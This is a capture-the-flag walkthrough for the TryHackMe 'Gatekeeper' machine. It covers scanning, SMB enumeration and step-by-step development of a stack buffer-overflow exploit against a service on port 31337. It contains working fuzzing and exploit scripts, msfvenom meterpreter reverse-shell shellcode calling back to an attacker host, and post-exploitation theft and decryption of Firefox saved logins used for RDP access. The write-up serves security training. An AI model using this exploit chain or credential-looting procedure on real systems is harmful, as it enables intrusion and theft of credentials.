Gatekeeper - Buffer Overflow

Note: because the machine was restarted during this write-up, you may see different IPs in the screenshots and commands.

1. Scanning 


-sV = service version detection: for every open port, find out which service (and version) is running on it.
-A = aggressive scan: gathers all the extra information, such as running service versions, OS version and...
-T4 = timing template, makes the scan faster
-oN = writes the result to the file nmap_scan
-v = verbose: while the scan is running you see the results line by line

┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# cat nmap_scan
# Nmap 7.80 scan initiated Fri Aug 14 04:32:54 2020 as: nmap -sV -A -T4 -oN nmap_scan -v 10.10.15.170
Nmap scan report for 10.10.5.157
Host is up (0.17s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello

|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Uptime guess: 0.008 days (since Fri Aug 14 04:25:15 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:af:47:af:7a:ab (unknown)
| Names:
|   GATEKEEPER<00>       Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   GATEKEEPER<20>       Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-08-14T00:35:56-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-14T04:35:56
|_  start_date: 2020-08-14T04:26:12

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   213.37 ms 10.11.0.1
2   213.71 ms 10.10.15.170

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 14 04:37:10 2020 -- 1 IP address (1 host up) scanned in 256.25 seconds

--------------

While the full scan is running, I will do a basic nmap scan to check only for the open ports.



Whenever you see ports 139 and 445 open, SMB is running, so start enumerating and see which folders are shared.
 
------------------------------------------

2. Enumerate SMB shared folders

 -L = list all the shared folders
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# smbclient -L 10.10.15.170

┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# smbclient //10.10.15.170/Users
$ dir

Go to the Share folder and download gatekeeper.exe:
get gatekeeper.exe
$ quit

Check the directory you ran smbclient from, the exe file will be there, or search for it:
# locate gatekeeper.exe

---------------------------------------

3. Copy the gatekeeper.exe to your Windows OS

Copy and paste it, or start a python web server in the folder where your exe file is:
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python -m SimpleHTTPServer

Then download it on your Windows OS.



--------------------------------

4. Run Immunity Debugger as administrator

Open gatekeeper.exe in the debugger and press Play so the service is running.

Check that we can communicate with the application running on our Windows machine;
this is also called spiking.

It shows that 3 bytes of data have been received.


 ---------------------------------------


5. Fuzzing / identification of the vulnerability 

Our fuzzing script, 1_fuzzing.py (Python 2):

import socket

# Send increasingly long strings of "A"s until the service stops answering.
# Strings: 1 byte, then 10 to 300 bytes in steps of 10 (31 strings in total).
counter = 10
fuzz_strings = ["A"]

while len(fuzz_strings) <= 30:
    fuzz_strings.append("A" * counter)
    counter = counter + 10

for fuzz in fuzz_strings:
    print "Fuzzing with %s bytes" % len(fuzz)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.45.153', 31337))   # gatekeeper.exe on the Windows VM
    s.send(fuzz + '\r\n\r\n')

    print s.recv(1024)                       # the service echoes "Hello <input>" while it is alive
    s.close()

┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python 1_fuzzing.py

It shows that after 150 bytes of data the fuzzing stopped.
If we are not wrong, the buffer is 146 bytes plus EIP, which is 4 bytes, for a total of 150 bytes.
We have crashed the service with 150 bytes of As.

But we still don't know the exact size of the buffer, also called the offset, which is somewhere between 1 and 150. So let's find it with the help of msf.

-----------------------------------

6. Finding the offset (from the beginning of the buffer up to EIP), i.e. the exact size of the buffer

First create a pattern of 150 bytes:
# msf-pattern_create -l 150

Then, after you have run your python script, copy the value from EIP:
# msf-pattern_offset -q (value from EIP)

┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python 2_finding_EiP.py
import socket

# Python 2 script: send the 150-byte cyclic pattern instead of "A"s, so the
# value that lands in EIP tells us where in the buffer the overwrite happens.
pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.45.153', 31337))
    s.send(pattern + '\r\n\r\n')
    print s.recv(1024)
    print "\nDone!."
except:
    print "Could not connect"


Check the application status in the debugger: it has crashed. Copy the value of EIP, which is 3956138.

This is how we create the pattern and check the exact size of the buffer.

It shows that the buffer size is 146.
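To show how msf-pattern_create and msf-pattern_offset arrive at 146, here is a small Python 3 re-implementation (an added example, not part of the original write-up or of Metasploit). The pattern bytes at offsets 146..149 are "8Ae9"; read as a little-endian dword they show up in EIP as 0x39654138, and looking that value up in the pattern gives the offset back.

```python
import string
import struct


def pattern_create(length):
    """Cyclic pattern as produced by msf-pattern_create: Aa0Aa1...Aa9Ab0...Zz9."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]   # length > 20280: the pattern is exhausted


def pattern_offset(eip_value, length=150):
    """Offset of the 4 pattern bytes that ended up in EIP, or None if not found.

    eip_value is the register as the debugger shows it. x86 is little-endian, so
    the first pattern byte written over the saved return address is EIP's low byte.
    """
    needle = struct.pack("<I", eip_value)
    idx = pattern_create(length).encode("ascii").find(needle)
    return idx if idx >= 0 else None


def eip_for_offset(offset, length=150):
    """Inverse check: the EIP value an overwrite at this offset would produce."""
    chunk = pattern_create(length)[offset:offset + 4].encode("ascii")
    return struct.unpack("<I", chunk)[0]


if __name__ == "__main__":
    print(pattern_create(150))          # the string used in 2_finding_EiP.py
    print(hex(eip_for_offset(146)))     # 0x39654138, i.e. the bytes "8Ae9"
    print(pattern_offset(0x39654138))   # 146
```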

----------------------------------

7. find JMP ESP 

Find a JMP ESP instruction from a DLL that has no ASLR (Address space layout randomization). 

To see all the modules in gatekeeper application type

!mona modules  


To find the JMP ESP pointers in gatekeeper.exe module type
!mona find -s "\xff\xe4" -m gatekeeper.exe

\xff\xe4 is the machine-code encoding of JMP ESP: ff is the opcode byte of the indirect JMP and e4 is the ModRM byte that selects ESP.
How did we know that this is the operation code (opcode) of JMP ESP?


OK, so we have only two pointers in this module.

Both addresses have ASLR and SEH protection off.

write the address in little-endian format

080416BF = b"\xBF\x16\x04\x08"

080414C3 = b"\xC3\x14\x04\x08".

After finding the pointers, click on either of the two addresses and this screen will appear. Right-click on the address --> Breakpoint --> Toggle, and you will see it highlighted.

The purpose of setting the breakpoint is to check whether execution reaches that address, so that we know the payload we place after it will run.

------------------------------

import socket

# Python 2 script: fill the 146-byte buffer with "A"s, then overwrite EIP with the
# JMP ESP address 080414C3 in little-endian byte order. With the breakpoint set on
# that address, the debugger should pause there when the data arrives.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = b'A' * 146 + b"\xC3\x14\x04\x08"
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.45.153', 31337))
    s.send(buffer + '\r\n\r\n')
    print s.recv(1024)
    print "\nDone!."
except:
    print "Could not connect"

The breakpoint is hit, so we have reached the address we wanted.

-------------------------

8. find the bad characters


Find badchars with Mona

Type the command below; it creates two files in the folder where your debugger and mona are installed:

file 1: bytearray.txt
file 2: bytearray.bin
!mona bytearray -b "\x00"

Open the bytearray.txt file, copy the byte array and paste it into your python script.
You can also find the bad characters by googling.

import socket

# Python 2 script: fill the buffer, put 4 "B"s where EIP goes, then append every
# byte from 0x01 to 0xff (0x00 is already excluded) so we can compare what lands
# on the stack with what we sent.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

buffer = b"A" * 146 + b"B" * 4 + badchars
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.45.153', 31337))
    s.send(buffer + '\r\n\r\n')
    s.close()
    print "\nDone!"
except:
    print "Could not connect"

4_finding_badchars.py

005519F8 is the stack pointer (ESP) at the time of the crash, i.e. where our byte array landed.

!mona compare -f bytearray.bin -a 005519F8
Possibly bad chars: 00 0a

So we found that the badchars are 00 and 0a, and we must exclude them from our payload.

Manually finding badchars:

If you see any of these three things, the character is a badchar:
1. Break of flow, like: (1,2,5,4,3,6,7,8,9)
2. Repetition, like: (1,2,2,3,4,5,6,7,8,9)
3. Completely removed (the character is not shown at all): 1,2,3,5,6,7,8,9
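The three manual rules above are exactly what a compare tool automates. As an added example (Python 3, not from the write-up and not mona's code), this applies them to constructed stack dumps: one where the copy stopped at 0x0a, as on this box, and one where a byte was converted on the way in.

```python
import difflib


def bytearray_without(excluded):
    """The byte array mona generates: 0x00-0xff minus the bytes already excluded."""
    return bytes(b for b in range(256) if b not in excluded)


def find_badchars(sent, dumped):
    """Compare what was sent with what landed on the stack.

    Returns (badchars, truncated): every byte value that was removed, mangled
    or duplicated, plus whether the copy stopped early (rule 3 at the tail,
    the classic sign of a terminator such as a newline).
    """
    sm = difflib.SequenceMatcher(None, sent, dumped, autojunk=False)
    bad = set()
    truncated = False
    for tag, i1, i2, j1, j2 in sm.get_opcodes():
        if tag == "equal":
            continue
        if tag == "delete" and i2 == len(sent) and j2 == len(dumped):
            # everything from sent[i1] onwards is missing: the copy stopped there
            truncated = True
            bad.add(sent[i1])
        elif tag in ("delete", "replace"):
            # rule 3 (removed) or rule 1 (break of flow: a different value stored)
            bad.update(sent[i1:i2])
        else:
            # rule 2 (repetition): extra bytes appeared in the dump
            bad.update(dumped[j1:j2])
    return sorted(bad), truncated


SENT = bytearray_without({0x00})   # what 4_finding_badchars.py sends
# Constructed dumps (not taken from the box): the copy stopped at 0x0a, and
# 0x0d was converted to 0x20 before being stored.
DUMP_TRUNCATED = SENT[:SENT.index(0x0a)]
DUMP_MANGLED = SENT.replace(b"\x0d", b"\x20")

if __name__ == "__main__":
    for name, dump in (("truncated", DUMP_TRUNCATED), ("mangled", DUMP_MANGLED)):
        bad, cut = find_badchars(SENT, dump)
        print("%-9s possibly bad chars: %s (truncated: %s)"
              % (name, " ".join("%02x" % b for b in bad), cut))
```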

-----------------------------

9. create shellcode 

We put the badchars we found into the -b option of msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.12.255 LPORT=443 -b "\x00\x0a" -f python --var-name shellcode

Output of msfvenom

------------------------------

10. open listener in Metasploit


Run the python script (Python 2):

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Shellcode generated with (badchars 00 and 0a excluded):
# msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.11.12.255 LPORT=443 -f py -b "\x00\x0a" --var-name shellcode
shellcode =  b""
shellcode += b"\xdd\xc2\xd9\x74\x24\xf4\xbe\x7b\x43\xab\xc2"
shellcode += b"\x5a\x2b\xc9\xb1\x56\x31\x72\x18\x83\xc2\x04"
shellcode += b"\x03\x72\x6f\xa1\x5e\x3e\x67\xa7\xa1\xbf\x77"
shellcode += b"\xc8\x28\x5a\x46\xc8\x4f\x2e\xf8\xf8\x04\x62"
shellcode += b"\xf4\x73\x48\x97\x8f\xf6\x45\x98\x38\xbc\xb3"
shellcode += b"\x97\xb9\xed\x80\xb6\x39\xec\xd4\x18\x00\x3f"
shellcode += b"\x29\x58\x45\x22\xc0\x08\x1e\x28\x77\xbd\x2b"
shellcode += b"\x64\x44\x36\x67\x68\xcc\xab\x3f\x8b\xfd\x7d"
shellcode += b"\x34\xd2\xdd\x7c\x99\x6e\x54\x67\xfe\x4b\x2e"
shellcode += b"\x1c\x34\x27\xb1\xf4\x05\xc8\x1e\x39\xaa\x3b"
shellcode += b"\x5e\x7d\x0c\xa4\x15\x77\x6f\x59\x2e\x4c\x12"
shellcode += b"\x85\xbb\x57\xb4\x4e\x1b\xbc\x45\x82\xfa\x37"
shellcode += b"\x49\x6f\x88\x10\x4d\x6e\x5d\x2b\x69\xfb\x60"
shellcode += b"\xfc\xf8\xbf\x46\xd8\xa1\x64\xe6\x79\x0f\xca"
shellcode += b"\x17\x99\xf0\xb3\xbd\xd1\x1c\xa7\xcf\xbb\x48"
shellcode += b"\x04\xe2\x43\x88\x02\x75\x37\xba\x8d\x2d\xdf"
shellcode += b"\xf6\x46\xe8\x18\x8f\x41\x0b\xf6\x37\x01\xf5"
shellcode += b"\xf7\x47\x0b\x32\xa3\x17\x23\x93\xcc\xfc\xb3"
shellcode += b"\x1c\x19\x68\xbe\x8a\xa8\x67\xb2\xb5\xc5\x75"
shellcode += b"\xca\x48\xad\xf0\x2c\x1a\x81\x52\xe1\xdb\x71"
shellcode += b"\x12\x51\xb4\x9b\x9d\x8e\xa4\xa3\x74\xa7\x4f"
shellcode += b"\x4c\x20\x9f\xe7\xf5\x69\x6b\x99\xfa\xa4\x11"
shellcode += b"\x99\x71\x4c\xe5\x54\x72\x25\xf5\x81\xe5\xc5"
shellcode += b"\x05\x52\x80\xc5\x6f\x56\x02\x92\x07\x54\x73"
shellcode += b"\xd4\x87\xa7\x56\x67\xcf\x58\x27\x51\xbb\x6f"
shellcode += b"\xbd\xdd\xd3\x8f\x51\xdd\x23\xc6\x3b\xdd\x4b"
shellcode += b"\xbe\x1f\x8e\x6e\xc1\xb5\xa3\x22\x54\x36\x95"
shellcode += b"\x97\xff\x5e\x1b\xc1\xc8\xc0\xe4\x24\x4b\x06"
shellcode += b"\x1a\xba\x64\xaf\x72\x44\x35\x4f\x82\x2e\xb5"
shellcode += b"\x1f\xea\xa5\x9a\x90\xda\x46\x31\xf9\x72\xcc"
shellcode += b"\xd4\x4b\xe3\xd1\xfc\x0a\xbd\xd2\xf3\x96\x4e"
shellcode += b"\xa8\x7c\x28\xaf\x4d\x95\x4d\xb0\x4d\x99\x73"
shellcode += b"\x8d\x9b\xa0\x01\xd0\x1f\x97\x1a\x67\x3d\xbe"
shellcode += b"\xb0\x87\x11\xc0\x90"



offset = 146                       # bytes before the saved return address (step 6)
address = b"\xC3\x14\x04\x08"      # JMP ESP at 080414C3, written little-endian (step 7)
nops = b"\x90" * 16                # NOP sled in front of the shellcode
payload = "A" * offset + address + nops + shellcode + "B" * 100   # trailing "B"s are padding
try:
    print "\nSending payload..."
    s.connect(('10.10.107.92', 31337))   # the target's IP after the machine restart
    s.send(payload + '\r\n\r\n')
    print "\nDone!."
except:
    print "Could not connect"

5_Shellcode.py



We got a meterpreter session.

--------------------------------

11. First flag  --> cat user.txt.taxt


----------------------------------------------------------------

12. Privilege Escalation

Let's enumerate applications:

Enumerate Firefox

Four files were downloaded to /root/.msf4/loot/

Downloaded files

Before renaming

--------------------------------------


13. download firefox decryptor tool

https://github.com/unode/firefox_decrypt

git clone https://github.com/unode/firefox_decrypt.git

--------------------------------

14. Rename the previous 4 downloaded files to their original names

thunar /root/.msf4/loot/

 1. cert9.db

 2. cookies.sqlite

 3. key4.db

 4. logins.json

     After renaming to their original names.

----------------------------------

15. run firefox_decryptor 

python firefox_decrypt.py /root/.msf4/loot/

--------------------------------

16. Connect to RDP 

xfreerdp /u:mayor /p:8CL.... /v:10.10.43.204


Final flag


